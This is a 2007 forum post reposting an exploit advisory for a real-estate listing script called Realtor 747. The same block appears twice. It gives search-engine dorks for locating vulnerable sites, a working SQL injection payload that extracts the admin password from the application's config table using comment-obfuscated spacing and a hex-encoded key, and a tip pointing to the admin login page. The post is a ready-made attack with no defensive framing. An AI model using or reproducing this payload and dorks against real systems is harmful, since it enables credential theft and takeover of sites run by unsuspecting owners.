Virangar
07-15-2007, 11:10 AM
Realtor 747 SQL Injection Vulnerbility
--==+=============================================== =================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+=============================================== =================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: [Only registered and activated users can see links]
DORK: inurl:"index.php?pageid=" Property Listings
DORK 2: inurl:"realtor747"
DESCRIPTION:
pullout admin password from database
EXPLOITS:
[Only registered and activated users can see links]**/UNION/**/ALL/**/SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21/**/FROM/**/AD747_CONFIG%20where/**/config_key=0x70617373776F7264/*
NOTE/TIP:
admin login is at /admin/
--==+=============================================== =================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+=============================================== =================================+==--
--==+=============================================== =================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+=============================================== =================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: [Only registered and activated users can see links]
DORK: inurl:"index.php?pageid=" Property Listings
DORK 2: inurl:"realtor747"
DESCRIPTION:
pullout admin password from database
EXPLOITS:
[Only registered and activated users can see links]**/UNION/**/ALL/**/SELECT/**/1,2,config_value,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21/**/FROM/**/AD747_CONFIG%20where/**/config_key=0x70617373776F7264/*
NOTE/TIP:
admin login is at /admin/
--==+=============================================== =================================+==--
--==+ Realtor 747 SQL Injection Vulnerbility +==--
--==+=============================================== =================================+==--